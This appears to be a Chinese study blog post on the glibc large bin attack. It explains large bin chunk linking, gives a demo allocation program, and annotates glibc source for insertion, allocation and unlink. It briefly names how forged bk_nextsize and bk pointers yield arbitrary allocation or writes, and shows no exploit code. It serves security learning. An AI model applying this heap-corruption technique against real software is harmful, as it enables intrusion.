<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="堆," />





  <link rel="alternate" href="/atom.xml" title="Archerの博客" type="application/atom+xml" />






<meta name="description" content="WP">
<meta property="og:type" content="article">
<meta property="og:title" content="largebinattack学习">
<meta property="og:url" content="http://example.com/2021/09/04/largebinattack%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Archerの博客">
<meta property="og:description" content="WP">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/1078447-20170326133441799-18505470.jpg">
<meta property="og:image" content="http://example.com/images/t01db59c4dfc94e2962.png">
<meta property="og:image" content="http://example.com/images/t0152a462d4217ece46.png">
<meta property="og:image" content="http://example.com/2021/09/04/largebinattack%E5%AD%A6%E4%B9%A0/images/2021-09-10165719.png">
<meta property="og:image" content="http://example.com/images/2021-09-10175021.png">
<meta property="og:image" content="http://example.com/images/2021-09-10185304.png">
<meta property="og:image" content="http://example.com/images/2021-09-10191722.png">
<meta property="og:image" content="http://example.com/images/2021-09-10191903.png">
<meta property="og:image" content="http://example.com/images/2021-09-10195218.png">
<meta property="og:image" content="http://example.com/images/2021-09-10211057.png">
<meta property="og:image" content="http://example.com/images/2021-09-10211635.png">
<meta property="og:image" content="http://example.com/images/2021-09-10215626.png">
<meta property="article:published_time" content="2021-09-04T02:02:00.000Z">
<meta property="article:modified_time" content="2021-09-18T13:55:59.712Z">
<meta property="article:author" content="Archer">
<meta property="article:tag" content="堆">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/1078447-20170326133441799-18505470.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>







  <title>largebinattack学习 | Archerの博客</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Archerの博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">记录一个菜鸡的成长之路</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-about"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-categories"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archives"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/09/04/largebinattack%E5%AD%A6%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Archerの博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">largebinattack学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-09-04T10:02:00+08:00">
                2021-09-04
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2021/09/04/largebinattack%E5%AD%A6%E4%B9%A0/" class="leancloud_visitors" data-flag-title="largebinattack学习">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          
              <div class="post-description">
                  WP
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本文基本参考的是(<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/183877">https://www.anquanke.com/post/id/183877</a>)<br>32位系统中大于512b,64位系统大于1024b的bin属于largebin，largebin的结构相比smallbin等较小的bin，要多两个堆<br>指针位fd_nextsize和bk_nextsize,作用是用来连接同一个bin中大小不同的chunk，用来加快查找堆的速度<br>largebin的连接图如下<br><img src="/images/1078447-20170326133441799-18505470.jpg"><br>largebinattack的大概思路是:<br>    1.在申请largebin的过程中，伪造largebin的bk_nextsize，实现非预期内存申请。<br>    2.在largebin插入的过程中，伪造largebin的bk_nextsize以及bk，实现任意地址写堆地址。</p>
<p>大小对应相同index中的堆块，其在链表中的排序方式为：<br>堆块从大到小排序。<br>对于相同大小的堆块，最先释放的堆块会成为堆头，其fd_nextsize与bk_nextsize会被赋值，其余的堆块释放后都会插入到该堆头结点的下一个结点，通过fd与bk链接，形成了先释放的在链表后面的排序方式，且其fd_nextsize与bk_nextsize都为0。<br>不同大小的堆块通过堆头串联，即堆头中fd_nextsize指向比它小的堆块的堆头，bk_nextsize指向比它大的堆块的堆头，从而形成了第一点中的从大到小排序堆块的方式。同时最大的堆块的堆头的bk_nextsize指向最小的堆块的堆头，最小堆块的堆头的fd_nextsize指向最大堆块的堆头，以此形成循环双链表。<br>接下来通过一段c代码来直观的看一下堆的管理机制(需要注意的是largebin不能与topchunk相连，否则free时会合并到topchunk)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> *gap;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">char</span> *ptr0=<span class="built_in">malloc</span>(<span class="number">0x400</span><span class="number">-0x10</span>); <span class="comment">//A</span></span><br><span class="line">    gap=<span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line">    <span class="keyword">char</span> *ptr1=<span class="built_in">malloc</span>(<span class="number">0x410</span><span class="number">-0x10</span>); <span class="comment">//B</span></span><br><span class="line">    gap=<span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line">    <span class="keyword">char</span> *ptr2=<span class="built_in">malloc</span>(<span class="number">0x420</span><span class="number">-0x10</span>); <span class="comment">//C</span></span><br><span class="line">    gap=<span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line">    <span class="keyword">char</span> *ptr3=<span class="built_in">malloc</span>(<span class="number">0x430</span><span class="number">-0x10</span>); <span class="comment">//D</span></span><br><span class="line">    gap=<span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="built_in">free</span>(ptr2);</span><br><span class="line">    <span class="built_in">free</span>(ptr3);</span><br><span class="line">    <span class="built_in">free</span>(ptr0);</span><br><span class="line">    <span class="built_in">free</span>(ptr1);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x440</span>); <span class="comment">//trigger that sort largebin from unsorted bin to largebins</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>堆的图示<br><img src="/images/t01db59c4dfc94e2962.png"><br>此时如果把size全都改为一样的，堆的结构如下<br><img src="/images/t0152a462d4217ece46.png"><br>可以看到只有基本是通过fd以及bk连接，只有c的fd_nextsize和bk_nextsize指向它自己<br>largebin chunk从unsorted bin中取下来放入到largebin中源码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* place chunk in bin */</span></span><br><span class="line"></span><br><span class="line">          <span class="keyword">if</span> (in_smallbin_range (size))</span><br><span class="line">            &#123;</span><br><span class="line">              ...  <span class="comment">// chunk为smallbin，放入到smallbin中</span></span><br><span class="line">            &#125;</span><br><span class="line">          <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">              victim_index = largebin_index (size);<span class="comment">//第一步，获取当前要插入的chunk对应的index</span></span><br><span class="line">              bck = bin_at (av, victim_index); <span class="comment">//当前index中最小的chunk</span></span><br><span class="line">              fwd = bck-&gt;fd;                   <span class="comment">//当前index中最大的chunk</span></span><br><span class="line"></span><br><span class="line">              <span class="comment">/* maintain large bins in sorted order */</span></span><br><span class="line">              <span class="keyword">if</span> (fwd != bck)</span><br><span class="line">                &#123; <span class="comment">// 该chunk对应的largebin index中不为空</span></span><br><span class="line">                  <span class="comment">/* Or with inuse bit to speed comparisons */</span></span><br><span class="line">                  size |= PREV_INUSE;</span><br><span class="line">                  <span class="comment">/* if smaller than smallest, bypass loop below */</span></span><br><span class="line">                  assert ((bck-&gt;bk-&gt;size &amp; NON_MAIN_ARENA) == <span class="number">0</span>);</span><br><span class="line">                  <span class="keyword">if</span> ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) (size) &lt; (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (bck-&gt;bk-&gt;size)) <span class="comment">//第三步，如果要插入的chunk的size小于当前index中最小chunk的大小，则直接插入到最后面。</span></span><br><span class="line">                    &#123;</span><br><span class="line">                      fwd = bck;</span><br><span class="line">                      bck = bck-&gt;bk;</span><br><span class="line"></span><br><span class="line">                      victim-&gt;fd_nextsize = fwd-&gt;fd;</span><br><span class="line">                      victim-&gt;bk_nextsize = fwd-&gt;fd-&gt;bk_nextsize;</span><br><span class="line">                      fwd-&gt;fd-&gt;bk_nextsize = victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;</span><br><span class="line">                    &#125;</span><br><span class="line">                  <span class="keyword">else</span></span><br><span class="line">                    &#123;</span><br><span class="line">                      assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == <span class="number">0</span>);</span><br><span class="line">                      <span class="keyword">while</span> ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) size &lt; fwd-&gt;size) <span class="comment">//第四步，如果插入的chunk不为最小，则通过`fd_nextsize`从大到小遍历chunk，找到小于等于要插入chunk的位置</span></span><br><span class="line">                        &#123;</span><br><span class="line">                          fwd = fwd-&gt;fd_nextsize;</span><br><span class="line">                          assert ((fwd-&gt;size &amp; NON_MAIN_ARENA) == <span class="number">0</span>);</span><br><span class="line">                        &#125;</span><br><span class="line"></span><br><span class="line">                      <span class="keyword">if</span> ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) size == (<span class="keyword">unsigned</span> <span class="keyword">long</span>) fwd-&gt;size)</span><br><span class="line">                        <span class="comment">/* Always insert in the second position.  */</span></span><br><span class="line">                        fwd = fwd-&gt;fd; <span class="comment">//第五步，如果存在堆头，则插入到堆头的下一个节点</span></span><br><span class="line">                      <span class="keyword">else</span></span><br><span class="line">                        &#123; <span class="comment">//第六步，否则这个chunk将会成为堆头，`bk_nextsize`和`fd_nextsize`将被置位</span></span><br><span class="line">                          victim-&gt;fd_nextsize = fwd;</span><br><span class="line">                          victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;</span><br><span class="line">                          fwd-&gt;bk_nextsize = victim;</span><br><span class="line">                          victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;</span><br><span class="line">                        &#125;</span><br><span class="line">                      bck = fwd-&gt;bk;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">              <span class="keyword">else</span>   <span class="comment">//第二步，chunk对应的largebin index中为空</span></span><br><span class="line">                victim-&gt;fd_nextsize = victim-&gt;bk_nextsize = victim;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">          mark_bin (av, victim_index);</span><br><span class="line">          <span class="comment">//设置fd与bk完成插入</span></span><br><span class="line">          victim-&gt;bk = bck; </span><br><span class="line">          victim-&gt;fd = fwd;</span><br><span class="line">          fwd-&gt;bk = victim;</span><br><span class="line">          bck-&gt;fd = victim;</span><br><span class="line">          ...</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>整个流程可以总结为：</p>
<p>   1.找到当前要插入的chunk对应的largebin的index，并定位该index中的最小的chunkbck和最大的chunkfwd。<br>   2.如果fwd等于bck，表明当前链表为空，则直接将该chunk插入，并设置该chunk为该大小堆块的堆头，将bk_nextsize和fd_nextsize赋值为它本身。<br>   3.如果fwd不等于bck，表明当前链表已经存在chunk，要做的就是找到当前chunk对应的位置将其插入。首先判断其大小是否小于最小chunk的size，(size) &lt; (bck-&gt;bk-&gt;size)，如果小于则说明该chunk为当前链表中最小的chunk，即插入位置在链表末尾，无需遍历链表，直接插入到链表的末尾，且该chunk没有对应的堆头，设置该chunk为相应堆大小堆的堆头，将bk_nextsize指向比它大的堆头，fd_nextsize指向双链表的第一个节点即最大的堆头。<br>   4.如果当前chunk的size不是最小的chunk，则从双链表的第一个节点即最大的chunk的堆头开始遍历，通过fd_nextsize进行遍历，由于fd_nextsize指向的是比当前堆头小的堆头，因此可以加快遍历速度。直到找到小于等于要插入的chunk的size。<br>   5.如果找到的chunk的size等于要插入chunk的size，则说明当前要插入的chunk的size已经存在堆头，那么只需将该chunk插入到堆头的下一个节点。<br>   6.如果找到的chunk的size小于当前要插入chunk的size，则说明当前插入的chunk不存在堆头，因此该chunk会成为堆头插入到该位置，设置fd_nextsize与bk_nextsize。</p>
<p>largebin申请相关源码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">         If a large request, scan through the chunks of current bin in</span></span><br><span class="line"><span class="comment">         sorted order to find smallest that fits.  Use the skip list for this.</span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">      <span class="keyword">if</span> (!in_smallbin_range (nb))</span><br><span class="line">        &#123;</span><br><span class="line">          bin = bin_at (av, idx); <span class="comment">//找到申请的size对应的largebin链表</span></span><br><span class="line"></span><br><span class="line">          <span class="comment">/* skip scan if empty or largest chunk is too small */</span></span><br><span class="line">          <span class="keyword">if</span> ((victim = first (bin)) != bin &amp;&amp;</span><br><span class="line">              (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (victim-&gt;size) &gt;= (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (nb)) <span class="comment">//第一步，判断链表的第一个结点，即最大的chunk是否大于要申请的size</span></span><br><span class="line">            &#123;</span><br><span class="line">              victim = victim-&gt;bk_nextsize; </span><br><span class="line">              <span class="keyword">while</span> (((<span class="keyword">unsigned</span> <span class="keyword">long</span>) (size = chunksize (victim)) &lt;</span><br><span class="line">                      (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (nb))) <span class="comment">//第二步，从最小的chunk开始，反向遍历 chunk size链表，直到找到第一个大于等于所需chunk大小的chunk退出循环</span></span><br><span class="line">                victim = victim-&gt;bk_nextsize; </span><br><span class="line"></span><br><span class="line">              <span class="comment">/* Avoid removing the first entry for a size so that the skip</span></span><br><span class="line"><span class="comment">                 list does not have to be rerouted.  */</span></span><br><span class="line">              <span class="keyword">if</span> (victim != last (bin) &amp;&amp; victim-&gt;size == victim-&gt;fd-&gt;size) <span class="comment">//第三步，申请的chunk对应的chunk存在多个结点，则申请相应堆头的下个结点，不申请堆头。</span></span><br><span class="line">                victim = victim-&gt;fd;</span><br><span class="line"></span><br><span class="line">              remainder_size = size - nb;</span><br><span class="line">              unlink (av, victim, bck, fwd); <span class="comment">//第四步，largebin unlink 操作</span></span><br><span class="line"></span><br><span class="line">              <span class="comment">/* Exhaust */</span></span><br><span class="line">              <span class="keyword">if</span> (remainder_size &lt; MINSIZE) <span class="comment">//第五步，如果剩余的空间小于MINSIZE，则将该空间直接给用户</span></span><br><span class="line">                &#123;</span><br><span class="line">                  set_inuse_bit_at_offset (victim, size);</span><br><span class="line">                  <span class="keyword">if</span> (av != &amp;main_arena)</span><br><span class="line">                    victim-&gt;size |= NON_MAIN_ARENA;</span><br><span class="line">                &#125;</span><br><span class="line">              <span class="comment">/* Split */</span></span><br><span class="line">              <span class="keyword">else</span></span><br><span class="line">                &#123;</span><br><span class="line">                  remainder = chunk_at_offset (victim, nb); <span class="comment">//第六步，如果当前剩余空间还可以构成chunk，则将剩余的空间放入到unsorted bin中。</span></span><br><span class="line">                  <span class="comment">/* We cannot assume the unsorted list is empty and therefore</span></span><br><span class="line"><span class="comment">                     have to perform a complete insert here.  */</span></span><br><span class="line">                  bck = unsorted_chunks (av);</span><br><span class="line">                  fwd = bck-&gt;fd;</span><br><span class="line">      <span class="keyword">if</span> (__glibc_unlikely (fwd-&gt;bk != bck))</span><br><span class="line">                    &#123;</span><br><span class="line">                      errstr = <span class="string">&quot;malloc(): corrupted unsorted chunks&quot;</span>;</span><br><span class="line">                      <span class="keyword">goto</span> errout;</span><br><span class="line">                    &#125;</span><br><span class="line">                  remainder-&gt;bk = bck;</span><br><span class="line">                  remainder-&gt;fd = fwd;</span><br><span class="line">                  bck-&gt;fd = remainder;</span><br><span class="line">                  fwd-&gt;bk = remainder;</span><br><span class="line">                  <span class="keyword">if</span> (!in_smallbin_range (remainder_size))</span><br><span class="line">                    &#123;</span><br><span class="line">                      remainder-&gt;fd_nextsize = <span class="literal">NULL</span>;</span><br><span class="line">                      remainder-&gt;bk_nextsize = <span class="literal">NULL</span>;</span><br><span class="line">                    &#125;</span><br><span class="line">                  set_head (victim, nb | PREV_INUSE |</span><br><span class="line">                            (av != &amp;main_arena ? NON_MAIN_ARENA : <span class="number">0</span>));</span><br><span class="line">                  set_head (remainder, remainder_size | PREV_INUSE);</span><br><span class="line">                  set_foot (remainder, remainder_size);</span><br><span class="line">                &#125;</span><br><span class="line">              check_malloced_chunk (av, victim, nb);</span><br><span class="line">              <span class="keyword">void</span> *p = chunk2mem (victim);</span><br><span class="line">              alloc_perturb (p, bytes);</span><br><span class="line">              <span class="keyword">return</span> p;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>可以将整个流程总结为：</p>
<p>   1.找到当前要申请的空间对应的largebin链表，判断第一个结点即最大结点的大小是否大于要申请的空间，如果小于则说明largebin中没有合适的堆块，需采用其他分配方式。<br>   2.如果当前largebin中存在合适的堆块，则从最小堆块开始，通过bk_nextsize反向遍历链表，找到大于等于当前申请空间的结点。<br>   3.为减少操作，判断找到的相应结点（堆头）的下个结点是否是相同大小的堆块，如果是的话，将目标设置为该堆头的第二个结点，以此减少将fd_nextsize与bk_nextsize赋值的操作。<br>   4.调用unlink将目标largebin chunk从双链表中取下。<br>   5.判断剩余空间是否小于MINSIZE，如果小于直接返回给用户。<br>   6.否则将剩余的空间构成新的chunk放入到unsorted bin中。<br>unlink源码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Take a chunk off a bin list */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> unlink(AV, P, BK, FD) &#123;                                            </span></span><br><span class="line">    <span class="keyword">if</span> (__builtin_expect (chunksize(P) != (next_chunk(P))-&gt;prev_size, <span class="number">0</span>))      </span><br><span class="line">      malloc_printerr (check_action, <span class="string">&quot;corrupted size vs. prev_size&quot;</span>, P, AV);  </span><br><span class="line">    FD = P-&gt;fd;                                      </span><br><span class="line">    BK = P-&gt;bk;                                      </span><br><span class="line">    <span class="keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="number">0</span>))              </span><br><span class="line">      malloc_printerr (check_action, <span class="string">&quot;corrupted double-linked list&quot;</span>, P, AV);  </span><br><span class="line">    <span class="keyword">else</span> &#123;                                      </span><br><span class="line">        FD-&gt;bk = BK;                                  </span><br><span class="line">        BK-&gt;fd = FD;                                  </span><br><span class="line">        <span class="keyword">if</span> (!in_smallbin_range (P-&gt;size)                      </span><br><span class="line">            &amp;&amp; __builtin_expect (P-&gt;fd_nextsize != <span class="literal">NULL</span>, <span class="number">0</span>)) &#123;              </span><br><span class="line">        <span class="keyword">if</span> (__builtin_expect (P-&gt;fd_nextsize-&gt;bk_nextsize != P, <span class="number">0</span>)          </span><br><span class="line">        || __builtin_expect (P-&gt;bk_nextsize-&gt;fd_nextsize != P, <span class="number">0</span>))    </span><br><span class="line">          malloc_printerr (check_action,                      </span><br><span class="line">                   <span class="string">&quot;corrupted double-linked list (not small)&quot;</span>,    </span><br><span class="line">                   P, AV);                          </span><br><span class="line">            <span class="keyword">if</span> (FD-&gt;fd_nextsize == <span class="literal">NULL</span>) &#123;                      </span><br><span class="line">                <span class="keyword">if</span> (P-&gt;fd_nextsize == P)                      </span><br><span class="line">                  FD-&gt;fd_nextsize = FD-&gt;bk_nextsize = FD;              </span><br><span class="line">                <span class="keyword">else</span> &#123;                                  </span><br><span class="line">                    FD-&gt;fd_nextsize = P-&gt;fd_nextsize;                  </span><br><span class="line">                    FD-&gt;bk_nextsize = P-&gt;bk_nextsize;                  </span><br><span class="line">                    P-&gt;fd_nextsize-&gt;bk_nextsize = FD;                  </span><br><span class="line">                    P-&gt;bk_nextsize-&gt;fd_nextsize = FD;                  </span><br><span class="line">                  &#125;                                  </span><br><span class="line">              &#125; <span class="keyword">else</span> &#123;                                  </span><br><span class="line">                P-&gt;fd_nextsize-&gt;bk_nextsize = P-&gt;bk_nextsize;              </span><br><span class="line">                P-&gt;bk_nextsize-&gt;fd_nextsize = P-&gt;fd_nextsize;              </span><br><span class="line">              &#125;                                      </span><br><span class="line">          &#125;                                      </span><br><span class="line">      &#125;                                          </span><br></pre></td></tr></table></figure>
<p>再看看largebin的unlink检查，从代码中可以看到，就是多了fd_nextsize和bk_nextsize俩个位置的检查，原理和fd和bk的检查一致。但是需要注意的是对于存在多个满足空间的堆块来说，申请出来的是堆头的下一个结点，它的fd_nextsize和bk_nextsize为空。也就是说即使它是largebin chunk，但是它的fd_nextsize也为空，即不满足条件__builtin_expect (P-&gt;fd_nextsize != NULL, 0)，对于此类chunk的unlink，只会像smallbin的unlink一样检查fd与bk，而不会对fd_nextsize与bk_nextsize进行检查与操作。</p>
<p>至此largebin链表的形成以及申请largebin都已经阐述清楚。再小结下，对于largebin的链表的插入，双链表是从大到小的chunk排序，相同大小的chunk会有一个堆头，只有堆头的fd_nextsize与bk_nextsize会被赋值，其余堆块的该字段为0。插入的遍历是通过fd_nextsize从大到小进行的，如果该插入的chunk存在对应堆头，则插入到该堆头的下一个结点，否则的话该chunk会成为堆头插入到链表中。</p>
